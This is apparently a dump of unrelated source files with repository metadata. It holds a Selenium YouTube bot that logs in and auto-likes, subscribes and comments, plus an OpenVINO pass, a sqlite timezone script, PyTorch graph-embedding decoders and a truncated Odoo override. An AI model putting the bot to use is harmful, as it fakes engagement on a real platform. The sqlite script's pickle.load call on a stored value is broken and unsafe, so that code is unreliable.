self.driver = webdriver.Edge('D:\selenium automation\youtube automation\edge_old.exe')#msedgedriver.exe')
except:
self.driver = webdriver.Edge('D:\selenium automation\youtube automation\msedgedriver.exe')
print("using [ Edge ] browser")
self.driver.maximize_window()
print("initialising the process ")
def geturl(self,url='https://www.youtube.com/'):
'''open provided url and eleminate any notifications box on window '''
driver = self.driver
print("opening url",url)
driver.get(url)
# print("url open")
time.sleep(2)
try:
driver.find_element_by_xpath("//*[@aria-label='Dismiss']").click()
print("trying eleminating notification box # ")
print("done")
time.sleep(5)
except :
pass
def signing(self):
'''signing into youtube by pre given values of email and password
but can only be used after geturl to get login option '''
driver = self.driver
print("signing")
time.sleep(5)
signi = '''//a[@href ='https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252F&hl=en&ec=65620']'''
driver.find_element_by_xpath(signi).click()
print("clicked on signi")
time.sleep(3)
try:
email = driver.find_element_by_xpath("//input[@id = 'identifierId']").send_keys(self.user)
nextB = driver.find_element_by_xpath("//*[text()= 'Next']")
nextB.click()
except:
email = driver.find_element_by_xpath("//input[@id = 'identifierId']").send_keys(self.user)
nextB = driver.find_element_by_xpath("//*[text()= 'Next']")
nextB.click()
time.sleep(5)
print("trying given password ")
passw = driver.find_element_by_xpath("//input[@type= 'password']").send_keys(self.password)
try:
driver.find_element_by_xpath("//*[text()= 'Next']").click()
time.sleep(5)
except :
print()
print("error founded trying again")
time.sleep(5)
#print("trying given password ")
#assw = driver.find_element_by_xpath("//input[@type= 'password']").send_keys(self.password)
driver.find_element_by_xpath("//*[text()= 'Next']").click()
time.sleep(5)
global result
try:
try:
result ='@@@@@@@@@@\n'+driver.find_element_by_xpath("//div[@jsname='B34EJ']/span").text+'\n@@@@@@@@@@@@@@@@@@@\n error found \n'
print(result)
driver.close()
except :
if driver.current_url=='''https://accounts.google.com/signin/v2/identifier?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252F&hl=en&ec=65620&flowName=GlifWebSignIn&flowEntry=ServiceLogin&cid=1&navigationDirection=forward''':
result ='error founded \nyour browser may be secure'
print(result)
driver.close()
finally:
return result
except :
result="login sucessfully :-:"
print(result)
return result
time.sleep(3)
try:
driver.find_element_by_xpath("//*[@aria-label='Dismiss']").click()
print("trying eleminating notification box # ")
print("done")
except :
pass
def find_video(self):
'''only TO find any video or chanal by name or url by input method later '''
driver = self.driver
que = input("have any\n 1.[name] or\n 2.[url] to find write 1/2 :")
if que == 1:
find = input("write name of [video] or [chanal] :_: :")
driver.get(f"https://www.youtube.com/results?search_query={find}")
else:
find = input("enter url that you have")
driver.get(find)
def like(self,url):
'''like video by video url '''
driver = self.driver
time.sleep(2)
print('now opening ',url)
driver.get(url)
time.sleep(3)
p="//div[@id='top-level-buttons']//a//yt-formatted-string[@id='text'][@aria-label]"
a=driver.find_element_by_xpath(p).get_attribute('aria-label')
a= a.split(' ')[0]
print(f"there are total {a} likes already")
try:
like = driver.find_element_by_xpath(f'''//div[@id="top-level-buttons"]//a//button[@aria-label="like this video along with {a} other people"]''')
b = like.get_attribute('aria-pressed')
#true= liked.false unliked
if b == 'true' :
print("video already liked")
else :
print("try to like")
like.click()
print("video liked @@@")
except :
print("not working\n retry loging again ")
def subscribe(self):
'''subscribe the video on calling
limitatiion : video should be already open #
good to use in loop'''
driver = self.driver
time.sleep(1)
try :
subs = driver.find_element_by_xpath("//div[@id='subscribe-button' and @class='style-scope ytd-video-secondary-info-renderer']//paper-button/yt-formatted-string")
print(subs.text)
if subs.text != 'SUBSCRIBED' :
print("NOT Subscribe yet trying :: ")
subs.click()
sub = "Subscribed @@@"
else :
sub = "already subscribed"
return sub
except TypeError:
print("element not founded ")
def commenting(self,comment):
''' comment on video
limitation url shoud alredy open '''
driver = self.driver
time.sleep(2)
# driver.execute_script("window.scrollTo(0,document.body.scrollHeight)"
# print(" scrolling ")
try:
for i in range(1):
driver.execute_script("arguments[0].scrollIntoView();",driver.find_element_by_xpath('//div[@id="continuations"and @class="style-scope ytd-item-section-renderer"]'))
print('scrolling ',1)
time.sleep(2)
try:
com = driver.find_element_by_xpath('//div[@id="placeholder-area"]')
com.click()
com.send_keys(comment)
except:
com = driver.find_element_by_xpath("//div[@id='contenteditable-root']")
com.click()
com.send_keys(comment)
time.sleep(1)
send =driver.find_element_by_xpath("//paper-button[@aria-label = 'Comment']")
send.click()
# print('done')
except:
print("unable to comment")
def scrole_page_and_video_links(self):
'''get all video info and store in a list variable and make it global
page shoud be already open '''
global url
driver=self.driver
time.sleep(5)
for i in range(5):
driver.execute_script("arguments[0].scrollIntoView();",driver.find_element_by_xpath('//div[@id="continuations"and @class="style-scope ytd-item-section-renderer"]'))
# print("scrolling into window wait <> ")
time.sleep(2)
# print()
url = [i.get_attribute('href') for i in driver.find_elements_by_xpath("//a[@id='thumbnail'][@href]")]
print(f"total {len(url)} videos founded @@")
return url
def close_end(self):
''' just to close driver at the end '''
driver = self.driver
time.sleep(5)
driver.close()
| 28.744604
| 369
| 0.650732
|
4a18fa450d5b391cafa7409532cf18b7eb13ab69
| 1,116
|
py
|
Python
|
model-optimizer/extensions/back/ParameterToPlaceholder.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 3
|
2020-02-09T23:25:37.000Z
|
2021-01-19T09:44:12.000Z
|
model-optimizer/extensions/back/ParameterToPlaceholder.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/extensions/back/ParameterToPlaceholder.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 2
|
2020-04-18T16:24:39.000Z
|
2021-01-19T09:42:19.000Z
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mo.back.replacement import BackReplacementPattern
from mo.graph.graph import Graph
class ParameterToInput(BackReplacementPattern):
enabled = True
graph_condition = [lambda graph: not graph.graph['cmd_params'].generate_experimental_IR_V10]
def pattern(self):
return dict(
nodes=[
('parameter', dict(kind='op', type='Parameter'))
],
edges=[]
)
def replace_pattern(self, graph: Graph, match: dict):
match['parameter']['type'] = 'Input'
| 31.885714
| 96
| 0.701613
|
4a18facd538f03698c2f07a9682cda569b9d2b55
| 397
|
py
|
Python
|
Using_Database_in_Python/Transaction_timing/11_tzcheck.py
|
ajeyln/python_scripts_udemy
|
387a027170207a12daf16c25a9592adb27e45870
|
[
"MIT"
] | null | null | null |
Using_Database_in_Python/Transaction_timing/11_tzcheck.py
|
ajeyln/python_scripts_udemy
|
387a027170207a12daf16c25a9592adb27e45870
|
[
"MIT"
] | null | null | null |
Using_Database_in_Python/Transaction_timing/11_tzcheck.py
|
ajeyln/python_scripts_udemy
|
387a027170207a12daf16c25a9592adb27e45870
|
[
"MIT"
] | null | null | null |
import sqlite3
import pytz
import pickle
db = sqlite3.connect("accounts.sqlite",detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"):
utc_time = row[0]
picked_zone = row[3]
zone = pickle.load(picked_zone)
local_time = pytz.utc.localize(utc_time).astimezone(zone)
print("{}\t{}\t{}".format(utc_time, local_time, local_time.tzinfo))
db.close()
| 30.538462
| 77
| 0.720403
|
4a18fd621151a9b74a54a2f22ff515ada00b135a
| 23,568
|
py
|
Python
|
graphqa/netquery/decoders.py
|
gengchenmai/se-kge
|
0e5a630a8403d4c7965de0f71e2e22b95f7be7bd
|
[
"Apache-2.0"
] | 9
|
2020-06-17T06:16:55.000Z
|
2021-11-18T10:35:15.000Z
|
graphqa/netquery/decoders.py
|
gengchenmai/se-kge
|
0e5a630a8403d4c7965de0f71e2e22b95f7be7bd
|
[
"Apache-2.0"
] | 1
|
2020-08-12T15:18:52.000Z
|
2020-08-13T01:06:36.000Z
|
graphqa/netquery/decoders.py
|
gengchenmai/se-kge
|
0e5a630a8403d4c7965de0f71e2e22b95f7be7bd
|
[
"Apache-2.0"
] | 3
|
2020-08-27T23:53:35.000Z
|
2021-06-29T06:33:31.000Z
|
import torch
import torch.nn as nn
from torch.nn import init
import numpy as np
import torch.nn.functional as F
"""
A set of decoder modules.
Each decoder takes pairs of embeddings and predicts relationship scores given these embeddings.
"""
"""
*Edge decoders*
For all edge decoders, the forward method returns a simple relationships score,
i.e. the likelihood of an edge, between a pair of nodes.
"""
class CosineEdgeDecoder(nn.Module):
"""
Simple decoder where the relationship score is just the cosine
similarity between the two embeddings.
Note: this does not distinguish between edges types
"""
def __init__(self):
super(CosineEdgeDecoder, self).__init__()
self.cos = nn.CosineSimilarity(dim=0)
def forward(self, embeds1, embeds2, rel):
# cosine, the larger, the better
return self.cos(embeds1, embeds2)
class DotProductEdgeDecoder(nn.Module):
"""
Simple decoder where the relationship score is just the dot product
between the embeddings (i.e., unnormalized version of cosine)
Note: this does not distinguish between edges types
"""
def __init__(self):
super(DotProductEdgeDecoder, self).__init__()
def forward(self, embeds1, embeds2, rel):
dots = torch.sum(embeds1 * embeds2, dim=0)
return dots
class BilinearEdgeDecoder(nn.Module):
"""
Decoder where the relationship score is given by a bilinear form
between the embeddings (i.e., one learned matrix per relationship type).
"""
def __init__(self, relations, dims):
super(BilinearEdgeDecoder, self).__init__()
self.relations = relations
self.mats = {}
self.cos = nn.CosineSimilarity(dim=0)
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.mats[rel] = nn.Parameter(
torch.FloatTensor(dims[rel[0]], dims[rel[2]]))
init.xavier_uniform(self.mats[rel])
self.register_parameter("_".join(rel), self.mats[rel])
def forward(self, embeds1, embeds2, rel):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
'''
acts = embeds1.t().mm(self.mats[rel])
return self.cos(acts.t(), embeds2)
class TransEEdgeDecoder(nn.Module):
"""
Decoder where the relationship score is given by translation of
the embeddings (i.e., one learned vector per relationship type).
"""
def __init__(self, relations, dims):
super(TransEEdgeDecoder, self).__init__()
self.relations = relations
self.vecs = {}
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.vecs[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]]))
init.uniform(self.vecs[rel], a=-6.0/np.sqrt(dims[rel[0]]), b=6.0/np.sqrt(dims[rel[0]]))
self.register_parameter("_".join(rel), self.vecs[rel])
def forward(self, embeds1, embeds2, rel):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
'''
trans_embed = embeds1 + self.vecs[rel].unsqueeze(1).expand(self.vecs[rel].size(0), embeds1.size(1))
trans_dist = (trans_embed - embeds2).pow(2).sum(0)
# trans_dist shape: [batch_size]
# TransE distance, the smaller, the better
return -trans_dist
class BilinearDiagEdgeDecoder(nn.Module):
"""
Decoder where the relationship score is given by a bilinear form
between the embeddings (i.e., one learned diagonal matrix per relationship type).
"""
def __init__(self, relations, dims):
super(BilinearDiagEdgeDecoder, self).__init__()
self.relations = relations
self.vecs = {}
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.vecs[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]]))
init.uniform(self.vecs[rel], a=-6.0/np.sqrt(dims[rel[0]]), b=6.0/np.sqrt(dims[rel[0]]))
self.register_parameter("_".join(rel), self.vecs[rel])
def forward(self, embeds1, embeds2, rel):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
'''
acts = (embeds1*self.vecs[rel].unsqueeze(1).expand(self.vecs[rel].size(0), embeds1.size(1))*embeds2).sum(0)
return acts
"""
*Metapath decoders*
For all metapath encoders, the forward method returns a compositonal relationships score,
i.e. the likelihood of compositonional relationship or metapath, between a pair of nodes.
"""
class BilinearMetapathDecoder(nn.Module):
"""
Each edge type is represented by a matrix, and
compositional relationships are a product matrices.
"""
def __init__(self, relations, dims):
'''
Args:
relations: a dict() of all triple templates
key: domain entity type
value: a list of tuples (range entity type, predicate)
dims: a dict(), node type => embed_dim of node embedding
'''
super(BilinearMetapathDecoder, self).__init__()
self.relations = relations
self.mats = {}
self.sigmoid = torch.nn.Sigmoid()
self.cos = nn.CosineSimilarity(dim=0)
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.mats[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]], dims[rel[2]]))
init.xavier_uniform(self.mats[rel])
self.register_parameter("_".join(rel), self.mats[rel])
def forward(self, embeds1, embeds2, rels):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
rels: a list of triple templates, a n-length metapath
'''
act = embeds1.t()
for i_rel in rels:
act = act.mm(self.mats[i_rel])
act = self.cos(act.t(), embeds2)
return act
def project(self, embeds, rel):
'''
embeds shape: [embed_dim, batch_size]
rel: triple template
'''
return self.mats[rel].mm(embeds)
class BilinearBlockDiagMetapathDecoder(nn.Module):
"""
This is only used for enc_agg_func == "concat"
Each edge type is represented by two matrix:
1) feature matrix for node featur embed
2) position matrix for node position embed
It can be seen as a block-diagal matrix
compositional relationships are a product matrices.
"""
def __init__(self, relations, dims, feat_dims, spa_embed_dim):
'''
Args:
relations: a dict() of all triple templates
key: domain entity type
value: a list of tuples (range entity type, predicate)
dims: a dict(), node type => embed_dim of node embedding
feat_dims: a dict(), node type => embed_dim of feature embedding
spa_embed_dim: the embed_dim of position embedding
'''
super(BilinearBlockDiagMetapathDecoder, self).__init__()
self.relations = relations
self.dims = dims
self.feat_dims = feat_dims
self.spa_embed_dim = spa_embed_dim
self.feat_mats = {}
self.pos_mats = {}
self.sigmoid = torch.nn.Sigmoid()
self.cos = nn.CosineSimilarity(dim=0)
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.feat_mats[rel] = nn.Parameter(torch.FloatTensor(feat_dims[rel[0]], feat_dims[rel[2]]))
init.xavier_uniform(self.feat_mats[rel])
self.register_parameter("feat-"+"_".join(rel), self.feat_mats[rel])
self.pos_mats[rel] = nn.Parameter(torch.FloatTensor(spa_embed_dim, spa_embed_dim))
init.xavier_uniform(self.pos_mats[rel])
self.register_parameter("pos-"+"_".join(rel), self.pos_mats[rel])
def forward(self, embeds1, embeds2, rels):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
rels: a list of triple templates, a n-length metapath
'''
# act: [batch_size, embed_dim]
act = embeds1.t()
feat_act, pos_act = torch.split(act,
[self.feat_dims[rels[0][0]],self.spa_embed_dim], dim=1)
for i_rel in rels:
feat_act = feat_act.mm(self.feat_mats[i_rel])
pos_act = pos_act.mm(self.pos_mats[i_rel])
# act: [batch_size, embed_dim]
act = torch.cat([feat_act, pos_act], dim=1)
act = self.cos(act.t(), embeds2)
return act
def project(self, embeds, rel):
'''
embeds shape: [embed_dim, batch_size]
rel: triple template
'''
feat_act, pos_act = torch.split(embeds.t(),
[self.feat_dims[rel[0]],self.spa_embed_dim], dim=1)
feat_act = feat_act.mm(self.feat_mats[rel])
pos_act = pos_act.mm(self.pos_mats[rel])
act = torch.cat([feat_act, pos_act], dim=1)
return act.t()
class BilinearBlockDiagPos2FeatMatMetapathDecoder(nn.Module):
"""
This is only used for enc_agg_func == "concat"
Each edge type is represented by two matrix:
1) feature matrix for node featur embed
2) position matrix for node position embed
It can be seen as a block-diagal matrix
compositional relationships are a product matrices.
"""
def __init__(self, relations, dims, feat_dims, spa_embed_dim):
'''
Args:
relations: a dict() of all triple templates
key: domain entity type
value: a list of tuples (range entity type, predicate)
dims: a dict(), node type => embed_dim of node embedding
feat_dims: a dict(), node type => embed_dim of feature embedding
spa_embed_dim: the embed_dim of position embedding
'''
super(BilinearBlockDiagPos2FeatMatMetapathDecoder, self).__init__()
self.relations = relations
self.dims = dims
self.feat_dims = feat_dims
self.spa_embed_dim = spa_embed_dim
self.feat_mats = {}
self.pos_mats = {}
self.pos2feat_mats = {}
self.sigmoid = torch.nn.Sigmoid()
self.cos = nn.CosineSimilarity(dim=0)
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.feat_mats[rel] = nn.Parameter(torch.FloatTensor(feat_dims[rel[0]], feat_dims[rel[2]]))
init.xavier_uniform(self.feat_mats[rel])
self.register_parameter("feat-"+"_".join(rel), self.feat_mats[rel])
self.pos_mats[rel] = nn.Parameter(torch.FloatTensor(spa_embed_dim, spa_embed_dim))
init.xavier_uniform(self.pos_mats[rel])
self.register_parameter("pos-"+"_".join(rel), self.pos_mats[rel])
self.pos2feat_mats[rel] = nn.Parameter(torch.FloatTensor(spa_embed_dim, feat_dims[rel[2]]))
init.xavier_uniform(self.pos2feat_mats[rel])
self.register_parameter("pos2feat-"+"_".join(rel), self.pos2feat_mats[rel])
def forward(self, embeds1, embeds2, rels, do_spa_sem_lift = False):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
rels: a list of triple templates, a n-length metapath
do_spa_sem_lift: whether to do pos embed to feat embed prediction
'''
# act: [batch_size, embed_dim]
act = embeds1.t()
if do_spa_sem_lift:
# make sure the input is a pos_embed
assert act.size()[1] == self.spa_embed_dim
# act: [batch_size, spa_embed_dim]
rel = rels[0]
# feat_act: [batch_size, embed_dim]
feat_act = act.mm(self.pos2feat_mats[rel])
# pos_act: [batch_size, spa_embed_dim]
pos_act = act.mm(self.pos_mats[rel])
for i_rel in rels[1:]:
feat_act = feat_act.mm(self.feat_mats[i_rel])
pos_act = pos_act.mm(self.pos_mats[i_rel])
else:
feat_act, pos_act = torch.split(act,
[self.feat_dims[rels[0][0]],self.spa_embed_dim], dim=1)
for i_rel in rels:
feat_act = feat_act.mm(self.feat_mats[i_rel])
pos_act = pos_act.mm(self.pos_mats[i_rel])
# act: [batch_size, embed_dim+spa_embed_dim]
act = torch.cat([feat_act, pos_act], dim=1)
act = self.cos(act.t(), embeds2)
return act
def project(self, embeds, rel, do_spa_sem_lift = False):
'''
embeds shape: [embed_dim, batch_size]
rel: triple template
do_spa_sem_lift: whether to do pos embed to feat embed prediction
'''
# act: [batch_size, embed_dim]
act = embeds.t()
if do_spa_sem_lift:
# make sure the input is a pos_embed
assert act.size()[1] == self.spa_embed_dim
# feat_act: [batch_size, embed_dim]
feat_act = act.mm(self.pos2feat_mats[rel])
# pos_act: [batch_size, spa_embed_dim]
pos_act = act.mm(self.pos_mats[rel])
else:
feat_act, pos_act = torch.split(act,
[self.feat_dims[rel[0]],self.spa_embed_dim], dim=1)
feat_act = feat_act.mm(self.feat_mats[rel])
pos_act = pos_act.mm(self.pos_mats[rel])
act = torch.cat([feat_act, pos_act], dim=1)
return act.t()
class DotBilinearMetapathDecoder(nn.Module):
"""
Each edge type is represented by a matrix, and
compositional relationships are a product matrices.
"""
def __init__(self, relations, dims):
super(DotBilinearMetapathDecoder, self).__init__()
self.relations = relations
self.mats = {}
self.sigmoid = torch.nn.Sigmoid()
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.mats[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]], dims[rel[2]]))
#init.xavier_uniform(self.mats[rel])
init.normal(self.mats[rel], std=0.1)
self.register_parameter("_".join(rel), self.mats[rel])
def forward(self, embeds1, embeds2, rels):
act = embeds1.t()
for i_rel in rels:
act = act.mm(self.mats[i_rel])
dots = torch.sum(act * embeds2, dim=0)
return dots
class TransEMetapathDecoder(nn.Module):
"""
Decoder where the relationship score is given by translation of
the embeddings, each relation type is represented by a vector, and
compositional relationships are addition of these vectors
"""
def __init__(self, relations, dims):
super(TransEMetapathDecoder, self).__init__()
self.relations = relations
self.vecs = {}
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.vecs[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]]))
init.uniform(self.vecs[rel], a=-6.0/np.sqrt(dims[rel[0]]), b=6.0/np.sqrt(dims[rel[0]]))
self.register_parameter("_".join(rel), self.vecs[rel])
self.cos = nn.CosineSimilarity(dim=0)
def forward(self, embeds1, embeds2, rels):
trans_embed = embeds1
for i_rel in rels:
trans_embed += self.vecs[i_rel].unsqueeze(1).expand(self.vecs[i_rel].size(0), embeds1.size(1))
trans_dist = self.cos(embeds2, trans_embed)
return trans_dist
def project(self, embeds, rel):
return embeds + self.vecs[rel].unsqueeze(1).expand(self.vecs[rel].size(0), embeds.size(1))
class BilinearDiagMetapathDecoder(nn.Module):
"""
Decoder where the relationship score is given by a bilinear form
between the embeddings (i.e., one learned diagonal matrix per relationship type).
"""
def __init__(self, relations, dims):
super(BilinearDiagMetapathDecoder, self).__init__()
self.relations = relations
self.vecs = {}
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.vecs[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]]))
init.uniform(self.vecs[rel], a=-6.0/np.sqrt(dims[rel[0]]), b=6.0/np.sqrt(dims[rel[0]]))
self.register_parameter("_".join(rel), self.vecs[rel])
def forward(self, embeds1, embeds2, rels):
acts = embeds1
for i_rel in rels:
acts = acts*self.vecs[i_rel].unsqueeze(1).expand(self.vecs[i_rel].size(0), embeds1.size(1))
acts = (acts*embeds2).sum(0)
return acts
def project(self, embeds, rel):
return embeds*self.vecs[rel].unsqueeze(1).expand(self.vecs[rel].size(0), embeds.size(1))
"""
Set intersection operators. (Experimental)
"""
class TensorIntersection(nn.Module):
"""
Decoder that computes the implicit intersection between two state vectors
Uses a symmetric tensor operation.
"""
def __init__(self, dims):
super(TensorIntersection, self).__init__()
self.inter_tensors = {}
for mode in dims:
dim = dims[mode]
self.inter_tensors[mode] = nn.Parameter(torch.FloatTensor(dim, dim, dim))
init.xavier_uniform(self.inter_tensors[mode])
self.register_parameter(mode+"_mat", self.inter_tensors[mode])
def forward(self, embeds1, embeds2, mode):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
'''
inter_tensor = self.inter_tensors[mode]
tensor_size = inter_tensor.size()
inter_tensor = inter_tensor.view(tensor_size[0]*tensor_size[1], tensor_size[2])
temp1 = inter_tensor.mm(embeds1)
temp1 = temp1.view(tensor_size[0], tensor_size[1], embeds2.size(1))
temp2 = inter_tensor.mm(embeds2)
temp2 = temp2.view(tensor_size[0], tensor_size[1], embeds2.size(1))
result = (temp1*temp2).sum(dim=1)
return result
class SetIntersection(nn.Module):
"""
Decoder that computes the implicit intersection between two state vectors
Applies an MLP and takes elementwise mins. then another MLP
"""
def __init__(self, mode_dims, expand_dims, use_relu = True, use_post_mat = True, agg_func=torch.min):
'''
Args:
mode_dims: the input embedding dim
expand_dims: the internal hidden state dim
'''
super(SetIntersection, self).__init__()
self.pre_mats = {}
self.use_post_mat = use_post_mat
if self.use_post_mat:
self.post_mats = {}
self.use_relu = use_relu
self.agg_func = agg_func
for mode in mode_dims:
self.pre_mats[mode] = nn.Parameter(torch.FloatTensor(expand_dims[mode], mode_dims[mode])) # [expand_embed_dim, embed_dim]
init.xavier_uniform(self.pre_mats[mode])
self.register_parameter(mode+"_premat", self.pre_mats[mode])
if self.use_post_mat:
self.post_mats[mode] = nn.Parameter(torch.FloatTensor(mode_dims[mode], expand_dims[mode]))
init.xavier_uniform(self.post_mats[mode])
self.register_parameter(mode+"_postmat", self.post_mats[mode])
# def forward(self, embeds1, embeds2, mode, embeds3 = []):
# '''
# Args:
# embeds1, embeds2 shape: [embed_dim, batch_size]
# embeds3: a list of [embed_dim, batch_size]
# Return:
# aggs: the computed embedding for the intersection variable, [mode_dims, batch_size]
# combined: the pre-intersect embeddings for each path, [num_query_path, expand_embed_dim, batch_size]
# '''
# # temp1, temp2 shape: [expand_embed_dim, batch_size]
# temp1_ = self.pre_mats[mode].mm(embeds1)
# temp1 = F.relu(temp1_)
# temp2_ = self.pre_mats[mode].mm(embeds2)
# temp2 = F.relu(temp2_)
# if len(embeds3) > 0:
# temp3_ = self.pre_mats[mode].mm(embeds3)
# temp3 = F.relu(temp3_)
# # concatenate sequence of tensors along a new dimension(dim=0 default)
# if not self.use_relu:
# combined_ = torch.stack([temp1_, temp2_, temp3_])
# combined = torch.stack([temp1, temp2, temp3])
# else:
# if not self.use_relu:
# combined_ = torch.stack([temp1_, temp2_])
# combined = torch.stack([temp1, temp2])
# aggs = self.agg_func(combined,dim=0)
# if type(aggs) == tuple:
# # For torch.min, the result is a tuple (min_value, index_tensor), we just get the 1st
# # For torch.mean, the result is just mean_value
# # so we need to check the result type
# aggs = aggs[0]
# if self.use_post_mat:
# aggs = self.post_mats[mode].mm(aggs)
# # aggs: [mode_dims, batch_size]
# if self.use_relu:
# return aggs, combined
# else:
# return aggs, combined_
def forward(self, mode, embeds_list):
'''
Args:
embeds_list: a list of embeds with shape [embed_dim, batch_size]
Return:
aggs: the computed embedding for the intersection variable, [mode_dims, batch_size]
combined: the pre-intersect embeddings for each path, [num_query_path, expand_embed_dim, batch_size]
'''
if len(embeds_list) < 2:
raise Exception("The intersection needs more than one embeding")
combined = []
combined_ = []
for i in range(len(embeds_list)):
embeds = embeds_list[i]
temp_ = self.pre_mats[mode].mm(embeds)
temp = F.relu(temp_)
if not self.use_relu:
combined_.append(temp_)
combined.append(temp)
if not self.use_relu:
combined_ = torch.stack(combined_)
combined = torch.stack(combined)
aggs = self.agg_func(combined,dim=0)
if type(aggs) == tuple:
# For torch.min, the result is a tuple (min_value, index_tensor), we just get the 1st
# For torch.mean, the result is just mean_value
# so we need to check the result type
aggs = aggs[0]
if self.use_post_mat:
aggs = self.post_mats[mode].mm(aggs)
# aggs: [mode_dims, batch_size]
if self.use_relu:
return aggs, combined
else:
return aggs, combined_
class SimpleSetIntersection(nn.Module):
"""
Decoder that computes the implicit intersection between two state vectors.
Takes a simple element-wise min.
"""
def __init__(self, agg_func=torch.min):
super(SimpleSetIntersection, self).__init__()
self.agg_func = agg_func
# def forward(self, embeds1, embeds2, mode, embeds3 = []):
# if len(embeds3) > 0:
# combined = torch.stack([embeds1, embeds2, embeds3])
# else:
# combined = torch.stack([embeds1, embeds2])
# aggs = self.agg_func(combined, dim=0)
# if type(aggs) == tuple:
# aggs = aggs[0]
# return aggs, combined
def forward(self, mode, embeds_list):
if len(embeds_list) < 2:
raise Exception("The intersection needs more than one embeding")
combined = torch.stack(embeds_list)
aggs = self.agg_func(combined, dim=0)
if type(aggs) == tuple:
aggs = aggs[0]
return aggs, combined
| 38.891089
| 133
| 0.602979
|
4a18fd9aee6a0653298bf1b3cd3b8a1f26888283
| 4,233
|
py
|
Python
|
force_translate/models/mrp_abstract_workorder.py
|
xpheragroup/FJAgosto21
|
aad1ba8104a6ea1dfcc39fc250897465872ea930
|
[
"MIT"
] | null | null | null |
force_translate/models/mrp_abstract_workorder.py
|
xpheragroup/FJAgosto21
|
aad1ba8104a6ea1dfcc39fc250897465872ea930
|
[
"MIT"
] | null | null | null |
force_translate/models/mrp_abstract_workorder.py
|
xpheragroup/FJAgosto21
|
aad1ba8104a6ea1dfcc39fc250897465872ea930
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.tools import float_compare, float_round, float_is_zero
# This module only changes string to force translate
# The original definition is done in mrp/models/mrp_abstract_workorder.py !
class MrpAbstractWorkorderLine(models.AbstractModel):
# Inherit class to make changes (on translate)
_inherit = "mrp.abstract.workorder.line"
# Overdefinition to remember type class
qty_done = fields.Float()
# (those memebers are defined on "mrp.abstract.workorder.line")
lot_id = fields.Many2one()
# No changes here. Those members are here to remember
move_id = fields.Many2one()
# type of fields and avoud no member linting errors
product_id = fields.Many2one()
# Overdefinition to remember function definition
def _get_final_lots(self):
raise NotImplementedError(
'Method _get_final_lots() undefined on %s' % self)
def _get_production(self):
# Overdefinition to remember function definition
raise NotImplementedError(
'Method _get_production() undefined on %s' % self)
# Overdefinition to remember function definition
def _get_produced_lots(self):
return self.move_id in self._get_production().move_raw_ids and self._get_final_lots() and [(4, lot.id) for lot in self._get_final_lots()]
# Overdefinition to force translate to ES_CO
def _update_move_lines(self):
""" update a move line to save the workorder line data"""
self.ensure_one()
if self.lot_id:
move_lines = self.move_id.move_line_ids.filtered(
lambda ml: ml.lot_id == self.lot_id and not ml.lot_produced_ids)
else:
move_lines = self.move_id.move_line_ids.filtered(
lambda ml: not ml.lot_id and not ml.lot_produced_ids)
if self.product_id.tracking != 'none' and not self.lot_id:
if not self.lot_id.quant_ids:
if self.lot_id.name:
raise UserError(_('No hay existencias del lote ' + self.lot_id.name + '.'))
else:
raise UserError(_('No hay un lote establecido en el producto ' + self.product_id.name + '.'))
for i in self.lot_id.quant_ids:
if i.location_id == self.move_id.location_id:
if i.quantity == 0:
raise UserError(_('No hay existencias del lote ' + i.lot_id + '.'))
raise UserError(_('Por favor, ingrese un número de lote para %s.' %
self.product_id.display_name)) # The first translation is done here
if self.lot_id and self.product_id.tracking == 'serial' and self.lot_id in self.move_id.move_line_ids.filtered(lambda ml: ml.qty_done).mapped('lot_id'):
# The second translation is done here
raise UserError(
_('No puedes utilizar el mismo número de lote dos veces.'))
for ml in move_lines:
rounding = ml.product_uom_id.rounding
if float_compare(self.qty_done, 0, precision_rounding=rounding) <= 0:
break
quantity_to_process = min(
